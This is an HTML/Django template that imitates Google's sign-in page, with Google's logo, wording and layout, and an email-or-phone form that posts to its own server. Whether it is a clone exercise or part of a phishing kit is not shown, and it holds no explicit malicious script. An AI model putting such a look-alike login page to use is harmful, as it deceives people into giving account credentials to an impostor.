<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Sign In</title>
    <link rel="stylesheet" href="static/css/style.css">

    <!-- Source for fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Noto+Sans&family=Ubuntu:wght@700&display=swap" rel="stylesheet">    
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@300&display=swap" rel="stylesheet">
</head>
<body style="font-family: 'Roboto', sans-serif;">
    <div id="container">
        <div id="square">
            <div id="logo_container">
                <img src="static/images/googlelogo.png" id="logo">
            </div>
            <div id="top_text">Sign in</div>
            <div id="top_subtext">Use your Google Account</div>
            <form method="POST">
                {% csrf_token %}
                <div id="input_container">
                    <input type="text" name="username" id="input">
                    <div id="placeholder">Email or phone</div>
                </div>
                <p style="font-size: 13px;color: rgb(117, 11, 11);padding-top: 10px;text-align: center;">{{msg}}</p>

                <div id="link1" class="link">Forgot email?</div>
                <div id="not">Not your computer? Use Guest mode to sign in privately.</div>
                <div id="link2" class="link">Learn more</div>
                <div id="last_split">
                    <div class="btn_container">
                        <a href="create_account"><input type="button" value="Create account" id="btn_left"></a>
                    </div>
                    <div id="btn2" class="btn_container">
                        <input type="submit" value="Next" name="next" id="btn_right">
                    </div>
                </div>
            </form>    
        </div>


        <div id="bottom_text">
            <div id="lang_container">
                <select name="lang" id="lang">
                    <option value="English(United States)">English(United States)</option>
                </select>
            </div>
            <div>Help</div>
            <div>Privacy</div>
            <div>Terms</div>

        </div>
    </div>
    
    <script src="static/script.js"></script>
</body>
</html>